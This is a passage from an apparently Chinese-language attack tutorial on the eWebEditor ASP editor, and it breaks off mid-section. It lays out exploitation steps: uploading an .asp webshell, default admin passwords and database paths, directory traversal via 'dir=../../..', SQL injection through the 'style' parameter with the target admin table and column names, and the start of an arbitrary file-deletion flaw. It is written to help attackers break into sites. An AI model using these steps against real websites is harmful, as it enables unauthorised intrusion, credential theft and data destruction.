ewebeditor asp版 2.1.6 上传漏洞利用程序
127.1/e/upload.asp
上传时修改此处上传地址。。。
如果你是上传的asp文件则成功后的地址为:
127.1/e/uploadfile/xxxxxxxxxx.asp
5.ewebeditor遍历路径漏洞
E
webeditor为非常常见的网站核心
程序,
默认数据库为 /db/ewebeditor.mdb 默认路径admin_login.asp 默认管理员admin密码admin(admin888)
ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限.
但是ewebeditor后台有个小小的缺陷. 可以历遍整个网站目录. 当然.数据库为只读的时候一样可以利用.
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&;dir=..
再加 &;dir=../..
&;dir=../../../.. 看到整个网站文件了
6.eweb2.7版本以下又一个注入
首先看代码(ewebeditor.asp):
ub InitPara()
' 取全屏标志
sFullScreen = Trim(Request.QueryString("fullscreen"))
' 取对应的内容ID
sContentID =
Trim(Request.QueryString("id"))
If sContentID = "" Then ShowErr "请传入调用参数ID,即隐藏的内容表单项ID!"
' 取样式初始值
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"
sSql = "select * from ewebeditor_style where s_name='" &; sStyleName &; "'"
oRs.Open sSql, oConn, 0, 1
If Not oRs.Eof Then
sStyleID = oRs("S_ID")
sStyleName = oRs("S_Name")
sStyleDir = oRs("S_Dir")
sStyleCSS = oRs("S_CSS")
sStyleUploadDir = oRs("S_UploadDir")
nStateFlag = oRs("S_StateFlag")
sDetectFromWord = oRs("S_DetectFromWord")
sInitMode = oRs("S_InitMode")
sBaseUrl = oRs("S_BaseUrl")
sStyleUploadDir = Replace(sStyleUploadDir, "\", "/")
If Right(sStyleUploadDir, 1) <> "/" Then
sStyleUploadDir = sStyleUploadDir &; "/"
End If
Else
ShowErr "无效的样式Style参数传入,如果要使用默认值,请留空!"
End If
oRs.Close
关键的是这两句:
sStyleName = Trim(Request.QueryString("style"))
If sStyleName = "" Then sStyleName = "standard"
sSql = "select * from ewebeditor_style where s_name='" &; sStyleName &; "'"
很明显的是style参数没有足够的过滤,如果我们自己给这个地方赋值的话,程序会报错的,
但接下来的一句还是让我们有可乘之机,If sStyleName = "" Then sStyleName = "standard"保留默认的还是会带入语句执行,加个单引号就报错了,如图2.[local]1[/local]
我试了好几款工具,发现只有pangolin可以注入,啊D只能发现注入不能继续猜解。
eweb默认的管理员表是:ewebeditor_system
这个表下的默认两个列名为:sys_UserName和sys_userpass
需要手动添加,
7.ewebeditor2.8最终版删除任意文件漏洞
这个漏洞可以很鸡肋,也可以很致命,关键看你怎么利用!
此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中,这是ewebeditor的测试页面,无须
登陆可以直接进入,看这些代码:
' 把带"|"的字符串转为数组
Dim aSavePathFileName
aSavePathFileName = Split(sSavePathFileName, "|")
' 删除